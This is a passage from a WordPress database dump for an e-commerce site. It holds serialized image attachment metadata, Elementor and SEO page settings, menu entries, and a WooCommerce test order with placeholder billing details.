yright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2116,621,'_wp_attached_file','2022/01/images-12.png'),(2117,621,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:98;s:4:\"file\";s:21:\"2022/01/images-12.png\";s:8:\"filesize\";i:110891;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"images-12-320x98.png\";s:5:\"width\";i:320;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38068;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"images-12-100x98.png\";s:5:\"width\";i:100;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13125;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"images-12-50x8.png\";s:5:\"width\";i:50;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:944;}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"images-12-300x49.png\";s:5:\"width\";i:300;s:6:\"height\";i:49;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"images-12-150x98.png\";s:5:\"width\";i:150;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"images-12-320x98.png\";s:5:\"width\";i:320;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"images-12-100x98.png\";s:5:\"width\";i:100;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:18:\"images-12-48x8.png\";s:5:\"width\";i:48;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:18:\"images-12-48x8.png\";s:5:\"width\";i:48;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2119,623,'_wp_attached_file','2022/01/4r.png'),(2120,623,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:915;s:6:\"height\";i:150;s:4:\"file\";s:14:\"2022/01/4r.png\";s:8:\"filesize\";i:175795;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"4r-320x150.png\";s:5:\"width\";i:320;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49291;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"4r-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12130;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:11:\"4r-50x8.png\";s:5:\"width\";i:50;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:950;}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"4r-300x49.png\";s:5:\"width\";i:300;s:6:\"height\";i:49;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"4r-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"4r-768x126.png\";s:5:\"width\";i:768;s:6:\"height\";i:126;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"4r-320x150.png\";s:5:\"width\";i:320;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"4r-600x98.png\";s:5:\"width\";i:600;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"4r-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:11:\"4r-48x8.png\";s:5:\"width\";i:48;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:11:\"4r-48x8.png\";s:5:\"width\";i:48;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2203,403,'_elementor_template_type','wp-page'),(2204,403,'_elementor_version','3.5.4'),(2207,403,'_aioseo_title',NULL),(2208,403,'_aioseo_description',NULL),(2209,403,'_aioseo_keywords',''),(2210,403,'_aioseo_og_title',NULL),(2211,403,'_aioseo_og_description',NULL),(2212,403,'_aioseo_og_article_section',''),(2213,403,'_aioseo_og_article_tags',''),(2214,403,'_aioseo_twitter_title',NULL),(2215,403,'_aioseo_twitter_description',NULL),(2218,644,'saved_buttons','a:7:{s:8:\"toolbar1\";s:121:\"bold italic strikethrough bullist numlist blockquote hr alignleft aligncenter alignright link unlink wpsetooltips wp_more\";s:8:\"toolbar2\";s:172:\"formatselect underline alignjustify forecolor pastetext removeformat charmap outdent indent undo redo columns bulletmngr anchor htmltemplate summary wpsebutton customstyles\";s:8:\"toolbar3\";s:0:\"\";s:8:\"toolbar4\";s:0:\"\";s:15:\"unused_toolbar1\";s:85:\"preview superscript subscript searchreplace print visualblocks rtl ltr wp_help unused\";s:15:\"unused_toolbar2\";s:44:\"fontselect fontsizeselect styleselect unused\";s:15:\"unused_toolbar3\";s:0:\"\";}'),(2219,644,'active_extra_btns','a:2:{s:12:\"active_wpfdl\";s:1:\"1\";s:12:\"active_wptml\";s:1:\"1\";}'),(2220,644,'roles_access','a:1:{i:0;s:13:\"administrator\";}'),(2221,644,'users_access','a:0:{}'),(2222,644,'post_types_active','a:6:{s:4:\"post\";s:4:\"post\";s:4:\"page\";s:4:\"page\";s:10:\"attachment\";s:10:\"attachment\";s:14:\"e-landing-page\";s:14:\"e-landing-page\";s:17:\"elementor_library\";s:17:\"elementor_library\";s:7:\"product\";s:7:\"product\";}'),(2223,644,'device_active','a:3:{i:0;s:7:\"desktop\";i:1;s:6:\"tablet\";i:2;s:6:\"mobile\";}'),(2224,8,'_edit_lock','1643689726:1'),(2225,648,'_menu_item_type','post_type'),(2226,648,'_menu_item_menu_item_parent','0'),(2227,648,'_menu_item_object_id','636'),(2228,648,'_menu_item_object','page'),(2229,648,'_menu_item_target',''),(2230,648,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2231,648,'_menu_item_xfn',''),(2232,648,'_menu_item_url',''),(2236,650,'_elementor_edit_mode','builder'),(2237,650,'_elementor_template_type','kit'),(2239,584,'_wp_page_template','default'),(2240,584,'_elementor_page_settings','a:2:{s:9:\"site_name\";s:7:\"Gopalak\";s:16:\"site_description\";s:0:\"\";}'),(2342,654,'_order_key','wc_order_CPL3v7aycSK9c'),(2343,654,'_customer_user','1'),(2344,654,'_payment_method','razorpay'),(2345,654,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(2346,654,'_customer_ip_address','171.76.108.252'),(2347,654,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36'),(2348,654,'_created_via','checkout'),(2349,654,'_cart_hash','9bd9fc10454315e41d128e3a37861c37'),(2350,654,'_billing_first_name','aaa'),(2351,654,'_billing_last_name','aaa'),(2352,654,'_billing_address_1','123'),(2353,654,'_billing_city','bangalore'),(2354,654,'_billing_state','KL'),(2355,654,'_billing_postcode','560078'),(2356,654,'_billing_country','IN'),(2357,654,'_billing_email','wp@dxpsites.com'),(2358,654,'_billing_phone','123456'),(2359,654,'_shipping_first_name','aaa'),(2360,654,'_shipping_last_name','aaa'),(2361,654,'_shipping_address_1','123'),(2362,654,'_shipping_city','bangalore'),(2363,654,'_shipping_state','KL'),(2364,654,'_shipping_postcode','560078'),(2365,654,'_shipping_country','IN'),(2366,654,'_order_currency','INR'),(2367,654,'_cart_discount','0'),(2368,654,'_cart_discount_tax','0'),(2369,654,'_order_shipping','0'),(2370,654,'_order_shipping_tax','0'),(2371,654,'_order_tax','0'),(2372,654,'_order_total','220.00'),(2373,654,'_order_version','6.2.1'),(2374,654,'_prices_include_tax','no'),(2375,654,'_billing_address_index','aaa aaa  123  bangalore KL 560078 IN wp@dxpsites.com 123456'),(2376,654,'_shipping_address_index','aaa aaa  123  bangalore KL 560078 IN '),(2377,654,'is_vat_exempt','no'),(2378,654,'_wcfmmp_order_processed','yes'),(2379,654,'_transaction_id','pay_IqJjdvEjyK7fxo'),(2380,654,'_date_paid','1643625156'),(2381,654,'_paid_date','2022-01-31 10:32:36'),(2382,654,'_download_permissions_granted','yes'),(2383,654,'_recorded_sales','yes'),(2384,654,'_recorded_coupon_usage_counts','yes'),(2385,654,'_order_stock_reduced','yes'),(2386,654,'_wcfm_new_order_notified','yes'),(2387,654,'_wcfm_membership_order_processed','yes'),(2388,654,'_new_order_email_sent','true'),(2389,654,'_wcfmmp_order_email_triggered','yes'),(2398,659,'_wp_attached_file','2022/01/cropped-1-02.png'),(2399,659,'_wp_attachment_context','site-icon'),(2400,659,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:24:\"2022/01/cropped-1-02.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"cropped-1-02-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"cropped-1-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:24:\"cropped-1-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"cropped-1-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"cropped-1-02-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"cropped-1-02-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:22:\"cropped-1-02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:22:\"cropped-1-02-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:24:\"cropped-1-02-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:24:\"cropped-1-02-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:24:\"cropped-1-02-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:22:\"cropped-1-02-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2418,667,'_customize_changeset_uuid','d6894293-b570-48be-aa0b-772d927e1d6c'),(2421,8,'_elementor_edit_mode','builder'),(2422,8,'_elementor_template_type','wp-page'),(2423,8,'_elementor_version','3.5.4'),(2424,669,'_wp_attached_file','2022/02/banner.png'),(2425,669,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:18:\"2022/02/banner.png\";s:8:\"filesize\";i:200669;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:18:\"banner-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:91844;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"banner-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:14628;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:16:\"banner-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2042;}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"banner-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"banner-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"banner-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"banner-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"banner-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"banner-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:16:\"banner-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:16:\"banner-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2428,671,'_wp_attached_file','2022/02/222.png'),(2429,671,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:15:\"2022/02/222.png\";s:8:\"filesize\";i:422242;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:15:\"222-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119217;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:15:\"222-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16300;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:13:\"222-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2307;}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"222-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"222-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"222-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"222-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:15:\"222-600x280.png\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"222-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:13:\"222-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:13:\"222-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2435,674,'_wp_attached_file','2022/02/banner-Recovered-04-scaled-e1643786574466.jpg'),(2436,674,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:53:\"2022/02/banner-Recovered-04-scaled-e1643786574466.jpg\";s:8:\"filesize\";i:134520;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:53:\"banner-Recovered-04-scaled-e1643786574466-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65979;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:53:\"banner-Recovered-04-scaled-e1643786574466-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41638;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:51:\"banner-Recovered-04-scaled-e1643786574466-50x23.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37515;}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-04-scaled-e1643786574466-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-1024x479.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-04-scaled-e1643786574466-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-04-scaled-e1643786574466-768x359.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-1536x718.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-04-2048x957.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-04-scaled-e1643786574466-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-04-scaled-e1643786574466-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-04-scaled-e1643786574466-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:51:\"banner-Recovered-04-scaled-e1643786574466-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:51:\"banner-Recovered-04-scaled-e1643786574466-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2437,675,'_wp_attached_file','2022/02/banner-Recovered-03-scaled-e1643786515355.jpg'),(2438,675,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:53:\"2022/02/banner-Recovered-03-scaled-e1643786515355.jpg\";s:8:\"filesize\";i:124831;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:53:\"banner-Recovered-03-scaled-e1643786515355-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65537;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:53:\"banner-Recovered-03-scaled-e1643786515355-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41524;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:51:\"banner-Recovered-03-scaled-e1643786515355-50x23.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37564;}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-03-scaled-e1643786515355-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-1024x479.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-03-scaled-e1643786515355-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-03-scaled-e1643786515355-768x359.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-1536x718.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-03-2048x957.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-03-scaled-e1643786515355-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-03-scaled-e1643786515355-600x280.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-03-scaled-e1643786515355-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:51:\"banner-Recovered-03-scaled-e1643786515355-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:51:\"banner-Recovered-03-scaled-e1643786515355-48x22.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2439,676,'_wp_attached_file','2022/02/banner-Recovered-01-scaled-e1643786852625.jpg'),(2440,676,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:920;s:6:\"height\";i:430;s:4:\"file\";s:53:\"2022/02/banner-Recovered-01-scaled-e1643786852625.jpg\";s:8:\"filesize\";i:98327;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:53:\"banner-Recovered-01-scaled-e1643786852625-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60915;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:53:\"banner-Recovered-01-scaled-e1643786852625-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40239;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:51:\"banner-Recovered-01-scaled-e1643786852625-50x23.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37323;}s:6:\"medium\";a:4:{s:4:\"file\";s:53:\"banner-Recovered-01-scaled-e1643786852625-300x140.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpe